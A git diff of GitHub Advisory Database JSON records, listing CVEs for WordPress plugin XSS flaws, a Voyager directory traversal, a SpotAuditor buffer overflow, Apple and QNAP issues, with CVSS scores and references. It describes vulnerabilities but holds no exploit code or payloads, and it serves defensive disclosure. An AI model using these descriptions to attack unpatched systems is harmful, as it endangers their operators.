"ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-1456" + }, + { + "type": "WEB", + "url": "https://hackerone.com/reports/3517928" + }, + { + "type": "WEB", + "url": "https://about.gitlab.com/releases/2026/02/10/patch-release-gitlab-18-8-4-released" + }, + { + "type": "WEB", + "url": "https://gitlab.com/gitlab-org/gitlab/-/issues/587688" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-770" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-11T12:16:04Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-w4mj-mj22-jm3c/GHSA-w4mj-mj22-jm3c.json b/advisories/unreviewed/2026/02/GHSA-w4mj-mj22-jm3c/GHSA-w4mj-mj22-jm3c.json index 9e0143968b66c..773e754e75b81 100644 --- a/advisories/unreviewed/2026/02/GHSA-w4mj-mj22-jm3c/GHSA-w4mj-mj22-jm3c.json +++ b/advisories/unreviewed/2026/02/GHSA-w4mj-mj22-jm3c/GHSA-w4mj-mj22-jm3c.json @@ -46,7 +46,8 @@ ], "database_specific": { "cwe_ids": [ - "CWE-74" + "CWE-74", + "CWE-77" ], "severity": "MODERATE", "github_reviewed": false, diff --git a/advisories/unreviewed/2026/02/GHSA-w4rx-r6r4-5c2v/GHSA-w4rx-r6r4-5c2v.json b/advisories/unreviewed/2026/02/GHSA-w4rx-r6r4-5c2v/GHSA-w4rx-r6r4-5c2v.json new file mode 100644 index 0000000000000..0f9646a7052d4 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-w4rx-r6r4-5c2v/GHSA-w4rx-r6r4-5c2v.json @@ -0,0 +1,25 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-w4rx-r6r4-5c2v", + "modified": "2026-02-20T06:30:38Z", + "published": "2026-02-20T06:30:38Z", + "aliases": [ + "CVE-2026-27317" + ], + "details": "Rejected reason: Not used", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-27317" + } + ], + "database_specific": { + "cwe_ids": [], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-20T04:15:57Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-w4wv-h996-6v9c/GHSA-w4wv-h996-6v9c.json b/advisories/unreviewed/2026/02/GHSA-w4wv-h996-6v9c/GHSA-w4wv-h996-6v9c.json new file mode 100644 index 0000000000000..f6d73b0c01487 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-w4wv-h996-6v9c/GHSA-w4wv-h996-6v9c.json @@ -0,0 +1,40 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-w4wv-h996-6v9c", + "modified": "2026-02-20T12:31:25Z", + "published": "2026-02-20T12:31:25Z", + "aliases": [ + "CVE-2026-2486" + ], + "details": "The Master Addons For Elementor plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'ma_el_bh_table_btn_text' parameter in versions up to, and including, 2.1.1 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-2486" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/changeset/3461745/master-addons/tags/2.1.2/addons/ma-business-hours/ma-business-hours.php" + }, + { + "type": "WEB", + "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/a78c2621-afff-40b4-ae45-831b2b847756?source=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-20T12:16:16Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-w569-6xv3-222m/GHSA-w569-6xv3-222m.json b/advisories/unreviewed/2026/02/GHSA-w569-6xv3-222m/GHSA-w569-6xv3-222m.json new file mode 100644 index 0000000000000..afff057551205 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-w569-6xv3-222m/GHSA-w569-6xv3-222m.json @@ -0,0 +1,44 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-w569-6xv3-222m", + "modified": "2026-02-11T09:30:18Z", + "published": "2026-02-11T09:30:18Z", + "aliases": [ + "CVE-2026-1804" + ], + "details": "The WDES Responsive Popup plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'wdes-popup-title' shortcode in all versions up to, and including, 1.3.6 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-1804" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/browser/wdes-responsive-popup/tags/1.3.6/lib/view/title.php#L77" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/browser/wdes-responsive-popup/tags/1.3.6/wdes-popup.php#L111" + }, + { + "type": "WEB", + "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/3afdffa7-23ec-41ea-b05a-152a69b7ce50?source=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-11T09:15:51Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-w5c2-6978-qx5h/GHSA-w5c2-6978-qx5h.json b/advisories/unreviewed/2026/02/GHSA-w5c2-6978-qx5h/GHSA-w5c2-6978-qx5h.json new file mode 100644 index 0000000000000..2cde9118c0c0e --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-w5c2-6978-qx5h/GHSA-w5c2-6978-qx5h.json @@ -0,0 +1,48 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-w5c2-6978-qx5h", + "modified": "2026-02-11T21:30:41Z", + "published": "2026-02-11T21:30:41Z", + "aliases": [ + "CVE-2020-37194" + ], + "details": "Backup Key Recovery 2.2.5 contains a denial of service vulnerability that allows attackers to crash the application by supplying an overly long registration key. Attackers can generate a 1000-character payload file and paste it into the registration key field to trigger an application crash.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:A/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2020-37194" + }, + { + "type": "WEB", + "url": "https://www.exploit-db.com/exploits/47864" + }, + { + "type": "WEB", + "url": "https://www.vulncheck.com/advisories/backup-key-recovery-recover-keys-crashed-hard-disk-drive-key-denial-of-service" + }, + { + "type": "WEB", + "url": "http://www.nsauditor.com" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-120" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-11T21:16:13Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-w5rw-6rc6-433j/GHSA-w5rw-6rc6-433j.json b/advisories/unreviewed/2026/02/GHSA-w5rw-6rc6-433j/GHSA-w5rw-6rc6-433j.json new file mode 100644 index 0000000000000..2f1f965d1b5e8 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-w5rw-6rc6-433j/GHSA-w5rw-6rc6-433j.json @@ -0,0 +1,25 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-w5rw-6rc6-433j", + "modified": "2026-02-14T06:30:57Z", + "published": "2026-02-14T06:30:57Z", + "aliases": [ + "CVE-2026-26295" + ], + "details": "Rejected reason: Not used", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-26295" + } + ], + "database_specific": { + "cwe_ids": [], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-14T04:15:57Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-w5xc-rm8g-jf7m/GHSA-w5xc-rm8g-jf7m.json b/advisories/unreviewed/2026/02/GHSA-w5xc-rm8g-jf7m/GHSA-w5xc-rm8g-jf7m.json new file mode 100644 index 0000000000000..fefbd0aca2b05 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-w5xc-rm8g-jf7m/GHSA-w5xc-rm8g-jf7m.json @@ -0,0 +1,36 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-w5xc-rm8g-jf7m", + "modified": "2026-02-18T00:30:16Z", + "published": "2026-02-18T00:30:16Z", + "aliases": [ + "CVE-2026-26119" + ], + "details": "Improper authentication in Windows Admin Center allows an authorized attacker to elevate privileges over a network.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-26119" + }, + { + "type": "WEB", + "url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-26119" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-287" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-17T23:16:22Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-w64w-h2r9-c284/GHSA-w64w-h2r9-c284.json b/advisories/unreviewed/2026/02/GHSA-w64w-h2r9-c284/GHSA-w64w-h2r9-c284.json new file mode 100644 index 0000000000000..0e93d4d7f44ff --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-w64w-h2r9-c284/GHSA-w64w-h2r9-c284.json @@ -0,0 +1,56 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-w64w-h2r9-c284", + "modified": "2026-02-19T18:31:49Z", + "published": "2026-02-19T18:31:49Z", + "aliases": [ + "CVE-2025-12448" + ], + "details": "The Smartsupp – live chat, AI shopping assistant and chatbots plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'code' parameter in all versions up to, and including, 3.9.1 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Subscriber-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-12448" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/browser/smartsupp-live-chat/tags/3.2/admin/class-smartsupp-admin.php#L105" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/browser/smartsupp-live-chat/tags/3.2/public/class-smartsupp.php#L177" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3398777%40smartsupp-live-chat&new=3398777%40smartsupp-live-chat&sfp_email=&sfph_mail=" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3402922%40smartsupp-live-chat&new=3402922%40smartsupp-live-chat&sfp_email=&sfph_mail=" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3403904%40smartsupp-live-chat&new=3403904%40smartsupp-live-chat&sfp_email=&sfph_mail=" + }, + { + "type": "WEB", + "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/3c298653-7f79-4ee2-89c8-8a6d0e1446b8?source=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-19T07:17:28Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-w65x-hpv6-vv6v/GHSA-w65x-hpv6-vv6v.json b/advisories/unreviewed/2026/02/GHSA-w65x-hpv6-vv6v/GHSA-w65x-hpv6-vv6v.json new file mode 100644 index 0000000000000..ac5a88b0aa191 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-w65x-hpv6-vv6v/GHSA-w65x-hpv6-vv6v.json @@ -0,0 +1,36 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-w65x-hpv6-vv6v", + "modified": "2026-02-12T15:32:46Z", + "published": "2026-02-12T00:31:03Z", + "aliases": [ + "CVE-2026-20610" + ], + "details": "This issue was addressed with improved handling of symlinks. This issue is fixed in macOS Tahoe 26.3. An app may be able to gain root privileges.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-20610" + }, + { + "type": "WEB", + "url": "https://support.apple.com/en-us/126348" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-59" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-11T23:16:04Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-w669-772h-5fh5/GHSA-w669-772h-5fh5.json b/advisories/unreviewed/2026/02/GHSA-w669-772h-5fh5/GHSA-w669-772h-5fh5.json new file mode 100644 index 0000000000000..41296480ce081 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-w669-772h-5fh5/GHSA-w669-772h-5fh5.json @@ -0,0 +1,40 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-w669-772h-5fh5", + "modified": "2026-02-12T15:32:42Z", + "published": "2026-02-11T15:30:25Z", + "aliases": [ + "CVE-2025-54147" + ], + "details": "A NULL pointer dereference vulnerability has been reported to affect Qsync Central. If a remote attacker gains a user account, they can then exploit the vulnerability to launch a denial-of-service (DoS) attack.\n\nWe have already fixed the vulnerability in the following version:\nQsync Central 5.0.0.4 ( 2026/01/20 ) and later", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N/E:U/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-54147" + }, + { + "type": "WEB", + "url": "https://www.qnap.com/en/security-advisory/qsa-26-02" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-476" + ], + "severity": "LOW", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-11T13:15:53Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-w6g5-6qxq-f96f/GHSA-w6g5-6qxq-f96f.json b/advisories/unreviewed/2026/02/GHSA-w6g5-6qxq-f96f/GHSA-w6g5-6qxq-f96f.json new file mode 100644 index 0000000000000..4c2b50e3e0138 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-w6g5-6qxq-f96f/GHSA-w6g5-6qxq-f96f.json @@ -0,0 +1,40 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-w6g5-6qxq-f96f", + "modified": "2026-02-12T21:31:25Z", + "published": "2026-02-11T15:30:25Z", + "aliases": [ + "CVE-2025-54161" + ], + "details": "An allocation of resources without limits or throttling vulnerability has been reported to affect File Station 5. If a remote attacker gains an administrator account, they can then exploit the vulnerability to prevent other systems, applications, or processes from accessing the same type of resource.\n\nWe have already fixed the vulnerability in the following version:\nFile Station 5 5.5.6.5068 and later", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:P/PR:H/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:H/E:U/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-54161" + }, + { + "type": "WEB", + "url": "https://www.qnap.com/en/security-advisory/qsa-26-03" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-770" + ], + "severity": "LOW", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-11T13:15:54Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-w6xg-jvhg-4qqw/GHSA-w6xg-jvhg-4qqw.json b/advisories/unreviewed/2026/02/GHSA-w6xg-jvhg-4qqw/GHSA-w6xg-jvhg-4qqw.json new file mode 100644 index 0000000000000..2f16f3011c2b9 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-w6xg-jvhg-4qqw/GHSA-w6xg-jvhg-4qqw.json @@ -0,0 +1,44 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-w6xg-jvhg-4qqw", + "modified": "2026-02-11T09:30:18Z", + "published": "2026-02-11T09:30:18Z", + "aliases": [ + "CVE-2026-0815" + ], + "details": "The Category Image plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'tag-image' parameter in all versions up to, and including, 2.0 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Editor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:C/C:L/I:L/A:N" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-0815" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/browser/category-image/tags/2.0/category-image.php#L28" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/browser/category-image/trunk/category-image.php#L28" + }, + { + "type": "WEB", + "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/fb28c526-67ae-441d-9964-5ac17b966687?source=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-11T09:15:51Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-w785-qrg6-5h74/GHSA-w785-qrg6-5h74.json b/advisories/unreviewed/2026/02/GHSA-w785-qrg6-5h74/GHSA-w785-qrg6-5h74.json new file mode 100644 index 0000000000000..d63688c8e22b5 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-w785-qrg6-5h74/GHSA-w785-qrg6-5h74.json @@ -0,0 +1,52 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-w785-qrg6-5h74", + "modified": "2026-02-13T00:32:52Z", + "published": "2026-02-13T00:32:52Z", + "aliases": [ + "CVE-2019-25336" + ], + "details": "SpotAuditor 5.3.2 contains a local buffer overflow vulnerability in the Base64 Encrypted Password tool that allows attackers to execute arbitrary code by crafting a malicious payload. Attackers can generate a specially crafted Base64 encoded payload to trigger a Structured Exception Handler (SEH) overwrite and execute shellcode on the vulnerable system.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:A/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-25336" + }, + { + "type": "WEB", + "url": "https://www.exploit-db.com/exploits/47719" + }, + { + "type": "WEB", + "url": "https://www.exploit-db.com/exploits/47759" + }, + { + "type": "WEB", + "url": "https://www.vulncheck.com/advisories/spotauditor-base-local-buffer-overflow-seh" + }, + { + "type": "WEB", + "url": "http://www.nsauditor.com" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-121" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-12T23:16:07Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-w79v-5572-69vq/GHSA-w79v-5572-69vq.json b/advisories/unreviewed/2026/02/GHSA-w79v-5572-69vq/GHSA-w79v-5572-69vq.json new file mode 100644 index 0000000000000..29c4521e2b3de --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-w79v-5572-69vq/GHSA-w79v-5572-69vq.json @@ -0,0 +1,56 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-w79v-5572-69vq", + "modified": "2026-02-11T21:30:42Z", + "published": "2026-02-11T21:30:42Z", + "aliases": [ + "CVE-2020-37214" + ], + "details": "Voyager 1.3.0 contains a directory traversal vulnerability that allows attackers to access sensitive system files by manipulating the asset path parameter. Attackers can exploit the path parameter in /admin/voyager-assets to read arbitrary files like /etc/passwd and .env configuration files.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2020-37214" + }, + { + "type": "WEB", + "url": "https://github.com/the-control-group/voyager/releases/tag/v1.2.7" + }, + { + "type": "WEB", + "url": "https://github.com/the-control-group/voyager/releases/tag/v1.3.0" + }, + { + "type": "WEB", + "url": "https://voyager.devdojo.com" + }, + { + "type": "WEB", + "url": "https://www.exploit-db.com/exploits/47875" + }, + { + "type": "WEB", + "url": "https://www.vulncheck.com/advisories/voyager-directory-traversal" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-22" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-11T21:16:17Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-w7gq-6p98-xh22/GHSA-w7gq-6p98-xh22.json b/advisories/unreviewed/2026/02/GHSA-w7gq-6p98-xh22/GHSA-w7gq-6p98-xh22.json index fb983741d1b02..642990f28e6a5 100644 --- a/advisories/unreviewed/2026/02/GHSA-w7gq-6p98-xh22/GHSA-w7gq-6p98-xh22.json +++ b/advisories/unreviewed/2026/02/GHSA-w7gq-6p98-xh22/GHSA-w7gq-6p98-xh22.json @@ -50,7 +50,8 @@ ], "database_specific": { "cwe_ids": [ - "CWE-74" + "CWE-74", + "CWE-94" ], "severity": "MODERATE", "github_reviewed": false, diff --git a/advisories/unreviewed/2026/02/GHSA-w7w9-2vjv-7r67/GHSA-w7w9-2vjv-7r67.json b/advisories/unreviewed/2026/02/GHSA-w7w9-2vjv-7r67/GHSA-w7w9-2vjv-7r67.json new file mode 100644 index 0000000000000..d7196d2e1ca2c --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-w7w9-2vjv-7r67/GHSA-w7w9-2vjv-7r67.json @@ -0,0 +1,40 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-w7w9-2vjv-7r67", + "modified": "2026-02-13T18:31:25Z", + "published": "2026-02-13T18:31:25Z", + "aliases": [ + "CVE-2026-2026" + ], + "details": "A vulnerability has been identified where weak file permissions in the Nessus Agent directory on Windows hosts could allow unauthorized access, potentially permitting Denial of Service (DoS) attacks.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:H" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:N/VC:L/VI:N/VA:H/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-2026" + }, + { + "type": "WEB", + "url": "https://www.tenable.com/security/tns-2026-05" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-276" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-13T17:16:14Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-w82w-6f63-rvgf/GHSA-w82w-6f63-rvgf.json b/advisories/unreviewed/2026/02/GHSA-w82w-6f63-rvgf/GHSA-w82w-6f63-rvgf.json new file mode 100644 index 0000000000000..18bab5af25116 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-w82w-6f63-rvgf/GHSA-w82w-6f63-rvgf.json @@ -0,0 +1,40 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-w82w-6f63-rvgf", + "modified": "2026-02-12T21:31:26Z", + "published": "2026-02-12T00:31:05Z", + "aliases": [ + "CVE-2026-20678" + ], + "details": "An authorization issue was addressed with improved state management. This issue is fixed in iOS 26.3 and iPadOS 26.3, iOS 18.7.5 and iPadOS 18.7.5. An app may be able to access sensitive user data.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-20678" + }, + { + "type": "WEB", + "url": "https://support.apple.com/en-us/126346" + }, + { + "type": "WEB", + "url": "https://support.apple.com/en-us/126347" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-200" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-11T23:16:10Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-w848-8gfw-8jhq/GHSA-w848-8gfw-8jhq.json b/advisories/unreviewed/2026/02/GHSA-w848-8gfw-8jhq/GHSA-w848-8gfw-8jhq.json new file mode 100644 index 0000000000000..12ceaf8fccd4f --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-w848-8gfw-8jhq/GHSA-w848-8gfw-8jhq.json @@ -0,0 +1,52 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-w848-8gfw-8jhq", + "modified": "2026-02-11T09:30:18Z", + "published": "2026-02-11T09:30:18Z", + "aliases": [ + "CVE-2026-1748" + ], + "details": "The Invoct – PDF Invoices & Billing for WooCommerce plugin for WordPress is vulnerable to unauthorized access of data due to a missing capability check on multiple functions in all versions up to, and including, 1.6. This makes it possible for authenticated attackers, with Subscriber-level access and above, to retrieve invoice clients, invoice items, and list of WordPress users along with their emails.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-1748" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/browser/kirilkirkov-pdf-invoice-manager/tags/1.6/KirilKirkovWpInvoices.php#L565" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/browser/kirilkirkov-pdf-invoice-manager/tags/1.6/KirilKirkovWpInvoices.php#L585" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/browser/kirilkirkov-pdf-invoice-manager/tags/1.6/KirilKirkovWpInvoices.php#L605" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/browser/kirilkirkov-pdf-invoice-manager/tags/1.6/KirilKirkovWpInvoices.php#L626" + }, + { + "type": "WEB", + "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/79e4b7e1-9fff-4ff2-be2b-6dfa5f1ff48a?source=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-862" + 